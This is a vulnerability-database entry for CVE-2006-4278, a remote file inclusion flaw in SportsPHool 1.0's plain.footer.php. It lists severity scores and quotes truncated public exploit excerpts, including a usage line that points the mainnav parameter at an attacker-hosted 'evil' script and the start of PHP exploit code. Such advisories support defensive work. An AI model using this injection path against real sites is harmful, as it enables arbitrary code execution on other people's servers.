7.5
CVSSv2

CVE-2006-4278

Published: 21/08/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in includes/layout/plain.footer.php in SportsPHool 1.0 allows remote malicious users to execute arbitrary PHP code via a URL in the mainnav parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sportsphool sportsphool 1.0

Exploits

/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - SportsPHool <= 10 (mainnav) Remote File Include Vulnerability + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: SportsPHool v10 - [Script site: sourceforgenet/ ...
<?php /* Sports PHool <= 10 Remote File Include Exploit Found and c0ded by cr4wl3r @hackb0x d0rk: no d0rk f0r kiddi0ts Script: sourceforgenet/projects/sportsphool/files/ usage: target: target/sportsphool/includes/layout/plainfooterphp?mainnav= evil: hackb0x/evilscripttxt? */ $cmd = $_POST["cmd"]; $target = $_POS ...